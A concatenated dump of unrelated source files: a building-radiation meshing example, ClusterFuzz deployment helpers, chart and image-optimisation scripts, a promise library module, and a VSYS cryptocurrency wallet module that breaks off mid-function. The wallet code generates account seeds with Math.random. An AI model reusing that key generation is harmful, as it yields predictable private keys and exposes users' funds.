    # Render the digraph to an in-memory PNG and show it on the axes.
    png_buffer = BytesIO(digraph.pipe(format='png'))
    ax.imshow(image.imread(png_buffer))
    ax.axis('off')
    return ax
|
from PySimultan import DataModel, Template, yaml
from src.PYSimultanRadiation import TemplateParser
from src.PYSimultanRadiation.geometry.scene import Scene
import os
from src.PYSimultanRadiation.config import config
import logging
# Module-level loggers for the example; INFO keeps progress visible without
# debug noise from either package.
logger = logging.getLogger('PySimultanRadiation')
logger.setLevel('INFO')
logger2 = logging.getLogger('PySimultan')
logger2.setLevel('INFO')
# Global default mesh size for all meshing operations (units defined by the
# project config — presumably meters; TODO confirm).
config.default_mesh_size = 1
def create_geometry_templates():
    """Build and return the list of PySimultan geometry templates used here.

    Currently a single 'Building' template. NOTE(review): the ``content``
    entries ('Usage', 'Constructions') and the slot keys ('Nutzung',
    'Aufbauzuweisungen', 'TGA') do not line up one-to-one — kept exactly as
    in the original example; confirm against the SIMULTAN project.
    """
    building = Template(template_name='Building',
                        template_id='102',
                        content=['Zones', 'Usage', 'Constructions'],
                        documentation='',
                        units={},
                        types={},
                        slots={'Zones': 'Liste_00',
                               'Aufbauzuweisungen': 'Liste_01',
                               'TGA': 'Liste_03',
                               'Nutzung': 'Liste_04'})
    return [building]
def run_example():
    """Run the SmartCampus shading/radiation example end to end.

    Dumps the geometry templates to a YAML file, loads the SIMULTAN project,
    builds a :class:`Scene` from the typed geometry model and exports several
    meshes (shading-analysis mesh, terrain, sky, scene surface) as VTK files
    into the current working directory.

    Raises
    ------
    FileNotFoundError
        If the SIMULTAN project file does not exist.
    """
    templates = create_geometry_templates()

    # Single source of truth for the template path (was duplicated before).
    template_file = r'F:\OneDrive\PythonProjects\SmartCampusRadiation\test\output\smart_campus_template.yml'
    with open(template_file, mode='w', encoding="utf-8") as f_obj:
        yaml.dump(templates, f_obj)

    project_file = r'F:\OneDrive\PythonProjects\SmartCampusRadiation\resources\SMART_CAMPUS_TU_WIEN_BIBLIOTHEK_2020.03.22_richtig_RAUMMODELL.simultan'
    if not os.path.isfile(project_file):
        # Bug fix: the original raised FileExistsError, which signals the
        # opposite condition; a missing file is FileNotFoundError.
        raise FileNotFoundError(f'File {project_file} does not exist')

    template_parser = TemplateParser(template_filepath=template_file)
    data_model = DataModel(project_path=project_file)
    # Called for its side effects: populates template_parser.typed_geo_models.
    data_model.get_typed_data(template_parser=template_parser, create_all=True)

    # Geo model id 123 is specific to this SIMULTAN project — TODO confirm.
    geo_model = template_parser.typed_geo_models[123]
    my_scene = Scene(vertices=geo_model.vertices,
                     edges=geo_model.edges,
                     edge_loops=geo_model.edge_loops,
                     faces=geo_model.faces,
                     volumes=geo_model.volumes,
                     terrain_height=14.2)

    my_scene.export_shading_analysis_mesh('shading_analysis_mesh_fine.vtk', mesh_size=1)
    # Property access triggers (and caches) meshing of the first volume.
    my_scene.volumes[0].mesh

    my_scene.add_terrain()
    my_scene.terrain.export_vtk('terrain.vtk')

    sky = my_scene.generate_sky()
    sky.mesh.write('sky.vtk')

    scene_surface_mesh = my_scene.surface_mesh
    scene_surface_mesh.write('scene.vtk')

    print('done')
# Entry point: run the example only when executed directly, not on import.
if __name__ == '__main__':
    run_example()
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""common.py contains common methods and variables that are used by multiple
commands."""
import datetime
import io
import os
import platform
import shutil
import subprocess
import sys
import tempfile
import urllib.request
import zipfile
from distutils import dir_util
from local.butler import constants
try:
from shlex import quote
except ImportError:
from pipes import quote
# Filenames that App Engine deployment cannot handle; deleted before deploy
# by _remove_invalid_files().
INVALID_FILENAMES = ['src/third_party/setuptools/script (dev).tmpl']
class GcloudError(Exception):
  """Raised when a gcloud invocation exits with a non-zero status."""
class GsutilError(Exception):
  """Raised when a gsutil invocation exits with a non-zero status."""
class Gcloud(object):
  """Project specific gcloud."""

  def __init__(self, project_id):
    # Cloud project every invocation is scoped to via --project.
    self.project_id = project_id

  def run(self, *args):
    """Run `gcloud --project=<id> <args>` and return its raw output."""
    command = ['gcloud', '--project=' + self.project_id] + list(args)
    return _run_and_handle_exception(command, GcloudError)
class Gsutil(object):
  """gsutil runner."""

  def run(self, *args):
    """Run `gsutil <args>` and return its raw output."""
    return _run_and_handle_exception(['gsutil'] + list(args), GsutilError)
def _run_and_handle_exception(arguments, exception_class):
"""Run a command and handle its error output."""
print('Running:', ' '.join(quote(arg) for arg in arguments))
try:
return subprocess.check_output(arguments)
except subprocess.CalledProcessError as e:
raise exception_class(e.output)
def _utcnow():
  """We need this method for mocking."""
  # Single seam for tests to patch instead of patching the datetime module.
  return datetime.datetime.utcnow()
def compute_staging_revision():
  """Staging revision adds 2 days to timestamp and append 'staging'."""
  # The +2 days keeps a staging revision ordered after prod revisions cut
  # around the same time (revision ordering matters; see _compute_revision).
  future = _utcnow() + datetime.timedelta(days=2)
  return _compute_revision(future, 'staging')
def compute_prod_revision():
  """Get prod revision."""
  # Same scheme as staging, but uses the current time and no extra suffix.
  return _compute_revision(_utcnow())
def _compute_revision(timestamp, *extras):
  """Return a revision that contains a timestamp, git-sha, user, and
  is_staging. The ordinality of revision is crucial for updating source code.
  Later revision *must* be greater than earlier revision. See:
  crbug.com/674173."""
  # Timestamp goes first so lexicographic order tracks chronological order.
  formatted_time = timestamp.strftime('%Y%m%d%H%M%S-utc')
  _, git_sha = execute('git rev-parse --short HEAD')
  parts = [formatted_time, git_sha.strip().decode('utf-8'), os.environ['USER']]
  parts.extend(extras)
  return '-'.join(parts)
def process_proc_output(proc, print_output=True):
  """Print output of process line by line. Returns the whole output."""
  collected = []
  # readline returns b'' only at EOF, so this drains stdout completely.
  for raw_line in iter(proc.stdout.readline, b''):
    if print_output:
      print('| %s' % raw_line.rstrip().decode('utf-8'))
    collected.append(raw_line)
  return b''.join(collected)
def execute_async(command, extra_environments=None, cwd=None):
  """Execute a bash command asynchronously. Returns a subprocess.Popen."""
  # Start from the current environment and layer any extras on top.
  env = os.environ.copy()
  if extra_environments:
    env.update(extra_environments)
  # stderr is folded into stdout so callers read a single stream.
  return subprocess.Popen(
      command,
      shell=True,
      stdout=subprocess.PIPE,
      stderr=subprocess.STDOUT,
      env=env,
      cwd=cwd)
def execute(command,
            print_output=True,
            exit_on_error=True,
            extra_environments=None,
            cwd=None):
  """Execute a bash command, returning (returncode, combined output bytes)."""
  message = 'Running: %s' % command
  if cwd:
    message += " (cwd='%s')" % cwd
  if print_output:
    print(message)

  proc = execute_async(command, extra_environments, cwd=cwd)
  output = process_proc_output(proc, print_output)
  proc.wait()

  if proc.returncode != 0:
    if print_output:
      print('| Return code is non-zero (%d).' % proc.returncode)
    if exit_on_error:
      if print_output:
        print('| Exit.')
      # Propagate the child's exit code as our own.
      sys.exit(proc.returncode)

  return (proc.returncode, output)
def kill_process(name):
  """Kill the process by its name."""
  current_platform = get_platform()
  if current_platform in ('linux', 'macos'):
    # -f matches against the full command line, not just the process name.
    execute('pkill -KILL -f "%s"' % name, exit_on_error=False)
  elif current_platform == 'windows':
    execute(
        'wmic process where (commandline like "%%%s%%") delete' % name,
        exit_on_error=False)
def is_git_dirty():
  """Check if git is dirty."""
  # `git status --porcelain` prints nothing when the tree is clean, so the
  # returned bytes act as a truthy "is dirty" flag for callers.
  return execute('git status --porcelain')[1]
def get_chromedriver_path():
  """Return path to chromedriver binary."""
  # virtualenv layout differs per platform: Scripts/*.exe vs bin/*.
  windows = get_platform() == 'windows'
  binary = 'chromedriver.exe' if windows else 'chromedriver'
  binary_directory = 'Scripts' if windows else 'bin'
  return os.path.join(os.environ['ROOT_DIR'], 'ENV', binary_directory, binary)
def _install_chromedriver():
  """Install the latest chromedriver binary in the virtualenv.

  Downloads the latest release version string, fetches the matching
  platform-specific archive and extracts the binary into the virtualenv.
  """
  # Download a file containing the version number of the latest release.
  # Bug fix: close the HTTP responses (they were leaked before).
  with urllib.request.urlopen(constants.CHROMEDRIVER_VERSION_URL) as response:
    version = response.read().decode()

  # get_platform() raises for unknown systems, so this lookup cannot fail.
  archive_name = {
      'linux': 'chromedriver_linux64.zip',
      'macos': 'chromedriver_mac64.zip',
      'windows': 'chromedriver_win32.zip',
  }[get_platform()]

  download_url = constants.CHROMEDRIVER_DOWNLOAD_PATTERN.format(
      version=version, archive_name=archive_name)
  with urllib.request.urlopen(download_url) as response:
    archive_io = io.BytesIO(response.read())

  chromedriver_path = get_chromedriver_path()
  output_directory = os.path.dirname(chromedriver_path)
  chromedriver_binary = os.path.basename(chromedriver_path)

  with zipfile.ZipFile(archive_io) as chromedriver_archive:
    chromedriver_archive.extract(chromedriver_binary, output_directory)
  os.chmod(chromedriver_path, 0o750)
  print('Installed chromedriver at: %s' % chromedriver_path)
def _pip():
  """Get the pip binary name."""
  # Centralized so every caller consistently uses the Python 3 pip.
  return 'pip3'
def _install_pip(requirements_path, target_path):
  """Perform pip install using requirements_path onto target_path."""
  # Wipe the target first so removed requirements don't linger.
  if os.path.exists(target_path):
    shutil.rmtree(target_path)

  command = '%s install -r %s --upgrade --target %s' % (
      _pip(), requirements_path, target_path)
  execute(command)
def _install_platform_pip(requirements_path, target_path, platform_name):
  """Install platform specific pip packages.

  Args:
    requirements_path: requirements file of platform-specific packages.
    target_path: directory the wheels are unpacked into.
    platform_name: key into constants.PLATFORMS / constants.ABIS.

  Raises:
    Exception: if the platform is unknown, or no supported pip platform has
        a matching wheel.
  """
  pip_platform = constants.PLATFORMS.get(platform_name)
  if not pip_platform:
    raise Exception('Unknown platform: %s.' % platform_name)

  # Some platforms can specify multiple pip platforms (e.g. macOS has multiple
  # SDK versions).
  if isinstance(pip_platform, str):
    pip_platforms = (pip_platform,)
  else:
    assert isinstance(pip_platform, tuple)
    pip_platforms = pip_platform

  pip_abi = constants.ABIS[platform_name]
  return_code = None  # Guards against an empty pip_platforms tuple.
  for pip_platform in pip_platforms:
    temp_dir = tempfile.mkdtemp()
    return_code, _ = execute(
        '{pip} download --no-deps --only-binary=:all: --platform={platform} '
        '--abi={abi} -r {requirements_path} -d {output_dir}'.format(
            pip=_pip(),
            platform=pip_platform,
            abi=pip_abi,
            requirements_path=requirements_path,
            output_dir=temp_dir),
        exit_on_error=False)
    if return_code != 0:
      print('Did not find package for platform: ' + pip_platform)
      # Bug fix: clean up the temp dir on failed attempts too (it leaked).
      shutil.rmtree(temp_dir, ignore_errors=True)
      continue

    execute('unzip -o -d %s \'%s/*.whl\'' % (target_path, temp_dir))
    shutil.rmtree(temp_dir, ignore_errors=True)
    break

  if return_code != 0:
    # Bug fix: the original used '... %s' + str(...), which concatenated the
    # strings and left a literal '%s' in the message; apply %-formatting.
    raise Exception('Failed to find package in supported platforms: %s' %
                    str(pip_platforms))
def _remove_invalid_files():
  """Remove invalid file whose filename is invalid to appengine."""
  for invalid_path in INVALID_FILENAMES:
    # Missing files are fine — nothing to clean up.
    if os.path.exists(invalid_path):
      os.remove(invalid_path)
def install_dependencies(platform_name=None, is_reproduce_tool_setup=False):
  """Install dependencies for bots.

  Args:
    platform_name: optional platform key for platform-specific wheels
        (see constants.PLATFORMS).
    is_reproduce_tool_setup: when True, stop after the pip installs (bower
        and chromedriver are not needed by the reproduce tool).
  """
  _install_pip('src/requirements.txt', 'src/third_party')
  if platform_name:
    _install_platform_pip(
        'src/platform_requirements.txt',
        'src/third_party',
        platform_name=platform_name)

  # App Engine needs the union of both requirements files; concatenate them
  # into a temp file. Bug fix: the source files were opened without ever
  # being closed — use context managers.
  with tempfile.NamedTemporaryFile() as f:
    for requirements_path in ('src/requirements.txt',
                              'src/appengine/requirements.txt'):
      with open(requirements_path, 'rb') as requirements_file:
        f.write(requirements_file.read())
    f.flush()
    _install_pip(f.name, 'src/appengine/third_party')

  # Only the previous dependencies are needed for reproduce tool installation.
  if is_reproduce_tool_setup:
    return

  _remove_invalid_files()
  execute('bower install --allow-root')
  _install_chromedriver()
def remove_symlink(target):
  """Removes a symlink.

  Bug fix: use os.path.lexists instead of os.path.exists — exists() follows
  the link and returns False for a dangling symlink, so broken links were
  never removed (and a subsequent os.symlink would then fail).
  """
  if not os.path.lexists(target):
    return

  # Directory junctions on Windows must be removed with rmdir.
  if os.path.isdir(target) and get_platform() == 'windows':
    os.rmdir(target)
  else:
    os.remove(target)
def symlink(src, target):
  """Create the target to link to the src."""
  src, target = os.path.abspath(src), os.path.abspath(target)
  # Replace any pre-existing link at the target location.
  remove_symlink(target)

  if get_platform() == 'windows':
    # Windows: create an NTFS directory junction instead of a POSIX symlink.
    execute(r'cmd /c mklink /j %s %s' % (target, src))
  else:
    os.symlink(src, target)

  assert os.path.exists(target), (
      'Failed to create {target} symlink for {src}.'.format(
          target=target, src=src))

  print('Created symlink: source: {src}, target {target}.'.format(
      src=src, target=target))
def copy_dir(src, target):
  """Copy directory, replacing any existing copy at target."""
  # ignore_errors makes rmtree a no-op when target doesn't exist, so the
  # explicit exists() check is unnecessary.
  shutil.rmtree(target, ignore_errors=True)
  shutil.copytree(src, target)
def has_file_in_path(filename):
  """Check to see if filename exists in the user's PATH."""
  # Bug fix: use os.pathsep (':' on POSIX, ';' on Windows) rather than a
  # hard-coded ':', and tolerate an unset PATH (os.getenv would return None).
  path = os.getenv('PATH', '')
  for path_component in path.split(os.pathsep):
    if os.path.isfile(os.path.join(path_component, filename)):
      return True

  return False
def test_bucket(env_var):
"""Get the integration test bucket."""
bucket = os.getenv(env_var)
if not bucket:
raise RuntimeError(
'You need to specify {var} for integration testing'.format(var=env_var))
return bucket
def kill_leftover_emulators():
  """Kill leftover instances of cloud emulators and dev_appserver."""
  for process_name in ('dev_appserver.py', 'CloudDatastore.jar',
                       'pubsub-emulator', 'run_bot'):
    kill_process(process_name)
def get_platform():
  """Get the platform."""
  system = platform.system()
  # Map platform.system() names onto the short names used across butler.
  name = {'Linux': 'linux', 'Darwin': 'macos', 'Windows': 'windows'}.get(system)
  if name is None:
    raise Exception('Unknown platform: %s.' % system)
  return name
def update_dir(src_dir, dst_dir):
  """Recursively copy from src_dir to dst_dir, replacing files but only if
  they're newer or don't exist.

  Reimplemented with os.walk + shutil.copy2 because distutils (dir_util) is
  deprecated and removed in Python 3.12.
  """
  for root, _, files in os.walk(src_dir):
    relative = os.path.relpath(root, src_dir)
    dst_root = dst_dir if relative == '.' else os.path.join(dst_dir, relative)
    os.makedirs(dst_root, exist_ok=True)
    for filename in files:
      src_path = os.path.join(root, filename)
      dst_path = os.path.join(dst_root, filename)
      # Copy only when the destination is missing or older (update semantics).
      if (not os.path.exists(dst_path) or
          os.path.getmtime(src_path) > os.path.getmtime(dst_path)):
        shutil.copy2(src_path, dst_path)
|
"""
redisimp - redis import tool
"""
from .api import * # noqa
from .multi import * # noqa
from .cli import * # noqa
from .version import __version__ # noqa
|
import DoughnutController from './controller.doughnut';
import defaults from '../core/core.defaults';
import {clone} from '../helpers/helpers.core';
// Pie charts reuse the doughnut implementation: start from a deep copy of
// the doughnut defaults...
defaults.set('pie', clone(defaults.doughnut));
// ...then override the cutout so the chart renders as a full disc (no hole).
defaults.set('pie', {
	cutoutPercentage: 0
});
// Pie charts are Doughnut chart with different defaults
export default DoughnutController;
|
/* eslint-disable import/no-unresolved,node/no-missing-import,node/no-extraneous-import */
import imagemin from 'imagemin';
import imageminOptipng from 'imagemin-optipng';
import imageminPngquant from 'imagemin-pngquant';
const options = {};
options.plugins = [];
options.plugins.push(
imageminPngquant({
speed: 2,
quality: [0.1, 0.2],
verbose: true,
}),
imageminOptipng({
optimizationLevel: 7,
}),
);
const baseDirectory = `public/static/images`;
const directories = [
'home',
// 'create-collective',
];
for (const directory of directories) {
imagemin([`${baseDirectory}/${directory}/original/joinus*.png`], {
...options,
destination: `${baseDirectory}/${directory}`,
}).then(files => {
console.log(`${baseDirectory}/${directory}/original/*.png was optimized, ${files.length} files`);
});
}
|
/**
* Copyright (c) 2013 Petka Antonov
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:</p>
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
"use strict";
module.exports = function(Promise, Promise$_All, PromiseArray) {
var SettledPromiseArray = require("./settled_promise_array.js")(
Promise, PromiseArray);
function Promise$_Settle(promises, useBound, caller) {
return Promise$_All(
promises,
SettledPromiseArray,
caller,
useBound === true ? promises._boundTo : void 0
).promise();
}
Promise.settle = function Promise$Settle(promises) {
return Promise$_Settle(promises, false, Promise.settle);
};
Promise.prototype.settle = function Promise$settle() {
return Promise$_Settle(this, true, this.settle);
};
};
|
import triplesec from "triplesec";
import PouchDB from "pouchdb";
import vsys from "@virtualeconomy/js-v-sdk";
import converters from "../utils/converters";
import { get_currency_by_country_code } from "../utils/currency";
import base58 from "base-58";
import { clean_json_text } from "../utils/json";
import get_browser_locales from "../utils/locales";
import { NODES_IP, CURRENCIES, LANGUAGES } from "../utils/constants";
/* VSYS SETUP */
const constants = vsys.constants;
// First node is the default; may be overridden by persisted settings.
let selected_node = NODES_IP[0];
const network_byte = constants.MAINNET_BYTE;
let chain = new vsys.Blockchain(selected_node, network_byte);
const TX_TYPE = 2; // Send / receive transactions
/* DB */
// revs_limit: 1 + auto_compaction keep the PouchDB stores compact.
const query_db = new PouchDB("query_db", {revs_limit: 1, auto_compaction: true});
const accounts_db = new PouchDB("accounts_db", {revs_limit: 1, auto_compaction: true});
/*const logged_accounts_db = new PouchDB("logged_accounts_db", {revs_limit: 1, auto_compaction: true});*/
const all_settings_db = new PouchDB("all_settings_db", {revs_limit: 1, auto_compaction: true});
// In-memory caches, populated lazily.
let logged_account = null;
let all_settings = null;
// Derive default language/currency settings from the browser's locales.
// Always returns {selected_language, selected_currency} (the original
// returned undefined when no locales were available; callers merge the
// result, so returning explicit defaults is backward compatible).
function _load_settings_locales() {
    // Get browser locales (most preferred first)
    const locales = get_browser_locales({language_code_only: false});
    // Defaults used when the browser exposes nothing useful
    let language = "en";
    let country = "usa";
    if(typeof locales !== "undefined") {
        // Bug fix: the original guarded the language-only branch with
        // `country == ""`, which could never be true because country
        // defaults to "usa" — so "en"-style locales were dead code. Track
        // explicitly whether a full "en-US"-style locale has been seen.
        let full_locale_seen = false;
        // Walk from the least preferred locale so the most preferred wins last
        for(let i = locales.length-1; i >= 0; i--) {
            const locale_array = locales[i].split("-");
            if(locale_array.length == 2) {
                // "en-US" style: set both language and country
                language = locale_array[0].toLowerCase();
                country = locale_array[1].toUpperCase();
                full_locale_seen = true;
            }else if(!full_locale_seen) {
                // "en" style: only honored when no full locale exists
                language = locale_array[0].toLowerCase();
            }
        }
    }
    const currency = get_currency_by_country_code(country).toLowerCase();
    return {
        selected_language: language,
        selected_currency: currency
    };
}
// Fetch a JSON document from `url` and invoke callback_function with the
// parsed object (or null if no XHR implementation is available).
function _loadJSON(url, callback_function) {
    let data_file = url;
    let http_request = new XMLHttpRequest();
    try{
        // Opera 8.0+, Firefox, Chrome, Safari
        http_request = new XMLHttpRequest();
    }catch (e) {
        // Internet Explorer Browsers (legacy ActiveX fallbacks)
        try{
            http_request = new ActiveXObject("Msxml2.XMLHTTP");
        }catch (e) {
            try{
                http_request = new ActiveXObject("Microsoft.XMLHTTP");
            }catch (e) {
                // Something went wrong
                callback_function(null);
            }
        }
    }
    http_request.onreadystatechange = function() {
        // readyState 4 = DONE. NOTE(review): the HTTP status is not checked
        // and JSON.parse may throw on non-JSON error bodies — confirm whether
        // callers rely on that behavior before tightening.
        if (http_request.readyState == 4 ) {
            // Javascript function JSON.parse to parse JSON data
            let jsonObj = JSON.parse(http_request.responseText);
            callback_function(jsonObj);
        }
    }
    // Asynchronous GET request.
    http_request.open("GET", data_file, true);
    http_request.send();
}
// Build a random identifier of `length` characters drawn from a fixed
// alphabet. Uses Math.random, so NOT cryptographically secure.
function _makeId(length) {
    const alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+*%&/()=?!$";
    let id = "";
    while(id.length < length) {
        id += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
    }
    return id;
}
// Convert an integer amount in minimal units (1e8 per whole coin) into a
// two-decimal display string like "1.23".
function _format_amount(amount) {
    const whole_units = amount / 100000000;
    return (Math.round(whole_units * 100) / 100).toFixed(2);
}
// Decode a base58-encoded transaction attachment into a readable string.
function _format_attachment(attachment) {
    const attachment_bytes = base58.decode(attachment);
    return converters.byteArrayToString(attachment_bytes);
}
// Normalize a raw payment transaction from the node into the flat shape the
// UI consumes (amounts as "x.xx" strings, memo decoded from base58).
function _format_transaction(transaction) {
    return {
        id: transaction.id,
        fee: _format_amount(transaction.feeCharged),
        // Divided by 1e6 — presumably nanoseconds to milliseconds; TODO
        // confirm against the node API.
        timestamp: transaction.timestamp / 1000000,
        sender: transaction.proofs[0].address,
        recipient: transaction.recipient,
        amount: _format_amount(transaction.amount),
        memo: _format_attachment(transaction.attachment)
    };
}
// Shallow-merge obj2 into obj1 (mutating obj1), skipping undefined values.
// Returns obj1, or a fresh object when obj1 is null/undefined.
function _merge_object(obj1, obj2){
    const merged = obj1 || {};
    Object.keys(obj2 || {}).forEach(function(key) {
        if(typeof obj2[key] !== "undefined") {
            merged[key] = obj2[key];
        }
    });
    return merged;
}
// Load persisted settings from the local DB (seeding defaults on first run)
// and deliver the settings object to `callback_function`. Also keeps the
// module-level `all_settings` / `selected_node` caches in sync.
function get_settings(callback_function) {
    if(all_settings !== null) {
        // Already cached in memory: answer immediately and stop.
        // Fix: the original fell through to the DB query and invoked the
        // callback a second time.
        callback_function(all_settings);
        return;
    }
    function cache_callback_function(error, response) {
        let doc_valid = false;
        let all_docs_query_error = false;
        if(!error) {
            // Get settings docs
            const settings = response.rows.map(function (row) {
                return row.doc;
            });
            // Choose the first
            if(typeof settings[0] !== "undefined") {
                // Fix: original compared `data` to the string "undefined"
                // (missing typeof), letting an undefined payload reach
                // JSON.parse and throw.
                if(typeof settings[0].data !== "undefined") {
                    const setting = JSON.parse(settings[0].data);
                    // Treat the doc as valid only if it looks like settings.
                    if(typeof setting.selected_node !== "undefined") {
                        doc_valid = true;
                        all_settings = _merge_object(all_settings, setting);
                        selected_node = all_settings.selected_node;
                        callback_function(all_settings);
                    }
                }
                // Delete all others — only one settings doc is kept.
                for(let i = 1; i < settings.length; i++) {
                    all_settings_db.remove(settings[i]);
                }
            }
        }else {
            all_docs_query_error = true;
        }
        // Create new defaults when nothing valid was stored.
        if(!doc_valid || all_docs_query_error) {
            all_settings = {
                explorer_address: "https://explorer.v.systems/address",
                selected_node: selected_node,
                sfx_enabled: false,
                vocal_enabled: false,
                selected_currency: "usd",
                selected_language: "en"
            };
            // Locale-derived language/currency override the hard defaults.
            all_settings = _merge_object(all_settings, _load_settings_locales());
            all_settings_db.post({
                data: JSON.stringify(all_settings)
            });
            selected_node = all_settings.selected_node;
            callback_function(all_settings);
        }
    }
    all_settings_db.allDocs({
        include_docs: true
    }, cache_callback_function);
}
// Persist `settings`, merged over the stored (or default) values, and hand
// the resulting settings object to `callback_function`.
function set_settings(settings, callback_function) {
    let all_setting_doc = null;
    // Keep the module-level node selection in sync immediately.
    if(typeof settings.selected_node !== "undefined") { selected_node = settings.selected_node }
    function cache_callback_function(error, response) {
        if(!error) {
            // Get settings docs
            const settings_docs = response.rows.map(function (row) {
                return row.doc;
            });
            // Choose the first
            if(typeof settings_docs[0] !== "undefined") {
                // Fix: original compared `data` to the string "undefined"
                // (missing typeof); an undefined payload would have crashed
                // JSON.parse below.
                if(typeof settings_docs[0].data !== "undefined") {
                    const setting = JSON.parse(settings_docs[0].data);
                    // Only a doc that looks like settings is reused.
                    if(typeof setting.selected_node !== "undefined") {
                        all_setting_doc = settings_docs[0];
                    }
                }
                // Delete all others — only one settings doc is kept.
                for(let i = 1; i < settings_docs.length; i++) {
                    all_settings_db.remove(settings_docs[i]);
                }
            }
        }
        // Create new
        if(!all_setting_doc) {
            const default_all_settings = {
                explorer_address: "https://explorer.v.systems/address",
                selected_node: selected_node,
                sfx_enabled: false,
                vocal_enabled: false,
                selected_currency: "usd",
                selected_language: "en"
            };
            all_settings = _merge_object(default_all_settings, settings);
            all_settings_db.post({
                data: JSON.stringify(all_settings)
            });
            callback_function(all_settings);
        }else { // Update the existing doc in place (same _id/_rev).
            const stored_settings = JSON.parse(all_setting_doc.data);
            all_settings = _merge_object(stored_settings, settings);
            all_settings_db.put({
                _id: all_setting_doc._id,
                _rev: all_setting_doc._rev,
                data: JSON.stringify(all_settings)
            });
            callback_function(all_settings);
        }
    }
    all_settings_db.allDocs({
        include_docs: true
    }, cache_callback_function);
}
// True when an account is currently unlocked in memory.
function is_logged() {
    return logged_account !== null;
}
// Create a brand-new account: derive a keypair from a random 32-char seed,
// encrypt the private key with `password` (triplesec), persist the public
// parts in the accounts DB, and set the account as logged in.
// `callback_function` receives the logged account, or null on encryption
// failure.
function create_account(password, name, callback_function) {
    let seed = _makeId(32);
    let new_account = new vsys.Account(network_byte);
    new_account.buildFromSeed(seed, 0);
    // Encrypt using triplesec
    triplesec.encrypt({
        data: new triplesec.Buffer(new_account.private_key),
        key: new triplesec.Buffer(password)
    }, function(error, buffer) {
        if(!error) {
            // Only the encrypted private key is ever written to disk.
            let pushed_account = {
                name: name,
                address: new_account.address,
                public_key: new_account.public_key,
                encrypted_private_key: buffer.toString('hex')
            };
            // Push account into DB (address doubles as the document id)
            accounts_db.put({
                _id: pushed_account.address,
                data: JSON.stringify(pushed_account),
                timestamp: Date.now(),
            });
            // The in-memory copy additionally keeps the clear private key
            // so the session can sign transactions.
            let new_logged_account = {
                name: name,
                address: new_account.address,
                public_key: new_account.public_key,
                private_key: new_account.private_key,
                encrypted_private_key: buffer.toString('hex')
            };
            logged_account = new_logged_account;
            callback_function(logged_account);
        }else {
            callback_function(null);
        }
    });
}
// Load every stored account document, decode its JSON payload (keeping the
// PouchDB revision for later updates), and pass the list — or null on query
// failure — to `callback_function`.
function get_accounts(callback_function) {
    accounts_db.allDocs({
        include_docs: true
    }, function(error, response) {
        if (error) {
            callback_function(null);
            return;
        }
        const decoded_accounts = response.rows.map(function(row) {
            const account = JSON.parse(row.doc.data);
            account._rev = row.doc._rev;
            return account;
        });
        callback_function(decoded_accounts);
    });
}
// Re-encrypt an account's private key under a new password (and new name).
// Flow: find the account by public key, decrypt with `old_password` to prove
// ownership, then re-encrypt with `new_password` and overwrite the stored
// doc. `callback_function` receives the updated logged account, or null when
// inputs are missing or decryption/encryption fails.
function change_password(public_key = "", old_password = "", new_password = "", _new_name = "", callback_function) {
    // Second stage: encrypt the already-decrypted key with the new password
    // and persist the updated account document.
    function set_new_password(new_account) {
        // Encrypt using triplesec
        triplesec.encrypt({
            data: new triplesec.Buffer(new_account.private_key),
            key: new triplesec.Buffer(new_password)
        }, function(error, buffer) {
            if(!error) {
                const account = {
                    name: _new_name,
                    address: new_account.address,
                    public_key: new_account.public_key,
                    encrypted_private_key: buffer.toString('hex')
                };
                // Push account into DB — reuses the stored doc's _rev
                // (attached by get_accounts) so this is an update, not a
                // conflicting insert.
                accounts_db.put({
                    _id: account.address,
                    _rev: new_account._rev,
                    data: JSON.stringify(account),
                    timestamp: Date.now(),
                });
                logged_account = account;
                // Keep the clear private key only in memory.
                logged_account.private_key = new_account.private_key;
                callback_function(logged_account);
            }else {
                callback_function(null);
            }
        });
    }
    // Find the account in DB
    if(public_key !== "" && old_password !== "") {
        function accounts_callback_function(all_accounts) {
            for(let i = 0; i < all_accounts.length; i++) {
                let account = all_accounts[i];
                if(account.public_key == public_key) {
                    // Is it the right password ? Decryption succeeding is
                    // the ownership check.
                    triplesec.decrypt({
                        data: new triplesec.Buffer(account.encrypted_private_key, "hex"),
                        key: new triplesec.Buffer(old_password)
                    }, function (error, buffer) {
                        if(!error) {
                            account.private_key = buffer.toString();
                            logged_account = account;
                            set_new_password(logged_account);
                        }else {
                            callback_function(null);
                        }
                    });
                }
            }
        }
        get_accounts(accounts_callback_function);
    }else {
        callback_function(null);
    }
}
// Unlock an account: find it by public key, decrypt its private key with
// `password`, and set it as the in-memory logged account. Called with empty
// arguments it returns the already-logged account (session check).
// `callback_function` receives the logged account or null on failure.
function login(public_key = "", password = "", callback_function) {
    // No credentials supplied: act as a "who is logged in?" query.
    if(public_key == "" && password == "" && logged_account !== null) {
        return callback_function(logged_account);
    }
    // Find the account in DB
    if(public_key !== "" && password !== "") {
        function accounts_callback_function(all_accounts) {
            for(let i = 0; i < all_accounts.length; i++) {
                let account = all_accounts[i];
                if(account.public_key == public_key) {
                    // Is it the right password ? Successful decryption is
                    // the authentication.
